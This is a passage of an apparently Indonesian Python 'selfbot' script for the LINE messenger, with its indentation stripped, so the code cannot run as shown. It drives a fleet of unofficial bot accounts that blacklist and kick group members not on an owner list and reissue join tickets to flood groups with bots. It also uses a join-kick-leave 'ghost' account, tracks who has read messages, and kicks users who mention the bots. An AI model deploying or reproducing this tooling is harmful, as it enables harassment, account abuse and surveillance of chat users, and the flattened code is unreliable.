kw.leaveGroup(op.param1)
else:
kw.acceptGroupInvitation(op.param1)
ginfo = kw.getGroup(op.param1)
kw.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Imid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ke.acceptGroupInvitation(op.param1)
ginfo = ke.getGroup(op.param1)
ke.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ke.leaveGroup(op.param1)
else:
ke.acceptGroupInvitation(op.param1)
ginfo = ke.getGroup(op.param1)
ke.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Jmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ky.acceptGroupInvitation(op.param1)
ginfo = ky.getGroup(op.param1)
ky.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ky.leaveGroup(op.param1)
else:
ky.acceptGroupInvitation(op.param1)
ginfo = ky.getGroup(op.param1)
ky.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
group = kn.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kn.cancelGroupInvitation(op.param1,[_mid])
kn.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = ko.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ko.cancelGroupInvitation(op.param1,[_mid])
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = kw.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kw.cancelGroupInvitation(op.param1,[_mid])
kw.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = ke.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ke.cancelGroupInvitation(op.param1,[_mid])
ke.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
js.acceptGroupInvitation(op.param1)
G = js.getGroup(op.param1)
G.preventedJoinByTicket = False
js.updateGroup(G)
Ticket = js.reissueGroupTicket(op.param1)
random.choice(KAC).acceptGroupInvitationByTicket(op.param1,Ticket)
js.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = True
js.updateGroup(G)
wait["blacklist"][op.param2] = True
js.leaveGroup(op.param1)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.inviteIntoGroup(op.param1,admin)
else:
pass
if op.param3 in JSmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = km.getGroup(op.param1)
G.preventedJoinByTicket = False
km.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(G)
Ticket = km.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = km.getGroup(op.param1)
G.preventedJoinByTicket = True
km.updateGroup(G)
Ticket = km.reissueGroupTicket(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
if Dmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
G = kb.getGroup(op.param1)
G.preventedJoinByTicket = False
kb.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(G)
Ticket = kb.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kb.getGroup(op.param1)
G.preventedJoinByTicket = True
kb.updateGroup(G)
Ticket = kb.reissueGroupTicket(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
pass
return
if Emid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
G = kn.getGroup(op.param1)
G.preventedJoinByTicket = False
kn.kickoutFromGroup(op.param1,[op.param2])
kn.updateGroup(G)
Ticket = kn.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kn.getGroup(op.param1)
G.preventedJoinByTicket = True
kn.updateGroup(G)
Ticket = kn.reissueGroupTicket(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
pass
return
if Fmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
G = ko.getGroup(op.param1)
G.preventedJoinByTicket = False
ko.kickoutFromGroup(op.param1,[op.param2])
ko.updateGroup(G)
Ticket = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ko.getGroup(op.param1)
G.preventedJoinByTicket = True
ko.updateGroup(G)
Ticket = ko.reissueGroupTicket(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
pass
if Gmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
G = kw.getGroup(op.param1)
G.preventedJoinByTicket = False
kw.kickoutFromGroup(op.param1,[op.param2])
kw.updateGroup(G)
Ticket = kw.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kw.getGroup(op.param1)
G.preventedJoinByTicket = True
kw.updateGroup(G)
Ticket = kw.reissueGroupTicket(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
pass
return
if Hmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = False
ke.kickoutFromGroup(op.param1,[op.param2])
ke.updateGroup(G)
Ticket = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = True
ke.updateGroup(G)
Ticket = ke.reissueGroupTicket(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
pass
return
if Imid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
G = ky.getGroup(op.param1)
G.preventedJoinByTicket = False
ky.kickoutFromGroup(op.param1,[op.param2])
ky.updateGroup(G)
Ticket = ky.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ky.getGroup(op.param1)
G.preventedJoinByTicket = True
ky.updateGroup(G)
Ticket = ky.reissueGroupTicket(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
pass
return
if any(a in op.param3 for a in admin):
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
random.choice(ABC).findAndAddContactsByMid(op.param1,admin)
random.choice(ABC).inviteIntoGroup(op.param1,admin)
except:
pass
return
if any(a in op.param3 for a in staff):
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
random.choice(ABC).findAndAddContactsByMid(op.param1,staff)
random.choice(ABC).inviteIntoGroup(op.param1,staff)
except:
pass
return
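# op.type 55 (read-receipt notification in the LINE Talk protocol, as used by this
# script): record who has read past the stored read point for the "lurking" feature,
# and feed the "sider" (cctv) watcher just below.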
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if cctv['cyduk'].get(op.param1) == True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
#image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1, image)
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
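# op.type 26 (incoming message): selfbot-only moderation. Kick senders on the talk
# blacklist, respond to (or punish) mentions of the bot accounts, and dump sticker or
# contact metadata when those toggles are on.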
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
